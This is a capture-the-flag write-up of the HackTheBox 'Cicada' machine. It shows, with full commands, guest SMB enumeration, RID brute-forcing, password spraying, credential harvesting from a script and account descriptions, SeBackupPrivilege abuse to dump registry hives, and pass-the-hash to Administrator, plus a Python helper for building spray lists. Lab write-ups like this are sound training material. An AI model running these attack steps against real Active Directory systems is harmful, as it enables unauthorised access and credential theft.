
Cicada

Hackthebox

Initial access

From the nmap scan we can see that multiple ports are open. In this case we will focus on port 445 (SMB):

nmap_scan

Using netexec authenticated as guest with an empty password, we can list the available shares:

netexec smb "10.10.11.35" -u guest -p '' --shares

shares

Adding --filter-shares READ WRITE restricts the output to the shares on which the current account actually has read or write access:

netexec smb "10.10.11.35" -u guest -p '' --shares --filter-shares READ WRITE

shares_filter

Using Impacket's smbclient (the -no-pass flag and the use command are Impacket's syntax, not Samba's), we can access the share HR:

smbclient -no-pass guest@10.10.11.35
use HR

HR_share

The file Notice from HR.txt can be retrieved and contains the following information:

Dear new hire!

Welcome to Cicada Corp! We’re thrilled to have you join our team. As part of our security protocols, it’s essential that you change your default password to something unique and secure.

Your default password is: “PASSWORD”

To change your password:

  1. Log in to your Cicada Corp account using the provided username and the default password mentioned above.
  2. Once logged in, navigate to your account settings or profile settings section.
  3. Look for the option to change your password. This will be labeled as “Change Password”.
  4. Follow the prompts to create a new password. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters.
  5. After changing your password, make sure to save your changes.

Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password.

If you encounter any issues or need assistance with changing your password, don’t hesitate to reach out to our support team at support@cicada.htb.

Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team!

Best regards, Cicada Corp

A password is indicated but no username is provided. Since the guest account can resolve domain SIDs, netexec's --rid-brute option cycles through RIDs and translates each one to an account name; the grep keeps only user objects (SidTypeUser), dropping groups and aliases:

netexec smb 10.10.11.35 -u guest -p "" --rid-brute | grep "idTypeUser"

users

The output of the command is saved to users.txt, and the following sed command keeps only the account name that follows the CICADA\ prefix:

sed -E 's/.*CICADA\\([^ ]+) .*/\1/' users.txt > usernames.txt

The following command sprays the password from the HR notice (stored in pass.txt) against every username found:

netexec smb 10.10.11.35 -u usernames.txt -p pass.txt

michael
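The grep/sed pipeline above keeps every SidTypeUser entry, which includes computer accounts (names ending in $, with long random passwords that are never worth spraying), and the [^ ]+ pattern would truncate any name containing a space. The following added parser is example code written for this page, not part of the original writeup or of netexec; it works on lines in the shape netexec prints for --rid-brute (the sample lines and their RIDs are constructed, not copied from the box) and produces a spray list containing only real user accounts:

```python
import re

# One --rid-brute line looks like: "<proto> <ip> <port> <host> <rid>: DOMAIN\name (SidTypeX)".
# The name may contain spaces (group names usually do), so match it lazily up to the SID type.
RID_LINE = re.compile(
    r"(?P<rid>\d+):\s+(?P<domain>[^\\\s]+)\\(?P<name>.+?)\s+\((?P<kind>SidType\w+)\)\s*$"
)

# Constructed sample in netexec's output format (hostname/RIDs are illustrative).
SAMPLE_RID_BRUTE = """\
SMB         10.10.11.35     445    CICADA-DC        498: CICADA\\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        500: CICADA\\Administrator (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        501: CICADA\\Guest (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        512: CICADA\\Domain Admins (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        1000: CICADA\\CICADA-DC$ (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        1104: CICADA\\michael.wrightson (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        1105: CICADA\\david.orelious (SidTypeUser)
"""


def parse_rid_brute(text):
    """Return (rid, domain, name, kind) for every resolved SID in --rid-brute output."""
    found = []
    for line in text.splitlines():
        m = RID_LINE.search(line)
        if m:
            found.append((int(m.group("rid")), m.group("domain"), m.group("name"), m.group("kind")))
    return found


def spray_candidates(text, keep_machine_accounts=False):
    """Usernames worth spraying: user objects only, computer accounts ($) dropped by default."""
    names = []
    for _rid, _domain, name, kind in parse_rid_brute(text):
        if kind != "SidTypeUser":
            continue  # groups and aliases cannot authenticate
        if name.endswith("$") and not keep_machine_accounts:
            continue  # machine accounts have random 120-character passwords
        names.append(name)
    return names


if __name__ == "__main__":
    # Write the list in the form netexec -u expects (one name per line).
    for user in spray_candidates(SAMPLE_RID_BRUTE):
        print(user)
```

Before spraying a list of several passwords, check the lockout threshold first (netexec smb 10.10.11.35 -u guest -p '' --pass-pol); netexec tries every password against every user, so a single password is one attempt per account, which stays below any sane threshold.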

The account michael.wrightson is valid. Listing the users with this account (the --users option prints each account's description field) reveals a password for david.orelious:

netexec smb "10.10.11.35" -u 'michael.wrightson' -p pass.txt --rid-brute --users

david_password

Using the same command as before, it is possible to see that david has access to the share DEV:

netexec smb "10.10.11.35" -u david.orelious -p david_pass.txt --shares --filter-shares READ WRITE

DEV

Using Impacket's smbclient with david's credentials, the share DEV can be accessed:

backup_script

The content of the retrieved file backup_script.ps1 is the following:

$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"

$username = "emily.oscars"
$password = ConvertTo-SecureString "PASSWORD" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"

The credentials of emily.oscars are hardcoded in the script. Wrapping the literal in ConvertTo-SecureString -AsPlainText offers no protection: anyone who can read the file can read the password. The account is a domain user that is allowed to log in over WinRM, so Evil-WinRM gives a shell as emily. The first flag is found on the Desktop of emily's account:

user_flag

Privilege escalation

Running whoami /priv shows that emily holds SeBackupPrivilege (typically granted through membership of the Backup Operators group):

priv

This privilege lets the account read any file regardless of its ACL, including the registry hives. Both the SAM hive (the local account hashes) and the SYSTEM hive (the boot key needed to decrypt them) are saved with reg save:

reg save hklm\sam sam.hive
reg save hklm\system system.hive

hives

After the two hive files are downloaded to the attacking machine (Evil-WinRM's download command does this), Impacket's secretsdump is run offline (LOCAL) to decrypt the SAM with the boot key from SYSTEM and print the account hashes:

secretsdump -outputfile dump.txt -sam sam.hive -system system.hive LOCAL

hashes

With the NT hash of Administrator there is no need to crack it: Evil-WinRM accepts the hash directly with -H (pass-the-hash):

evil-winrm -u administrator -H 2b87e7c93XXXX -i 10.10.11.35

The root flag is found on the Desktop of the Administrator account:

root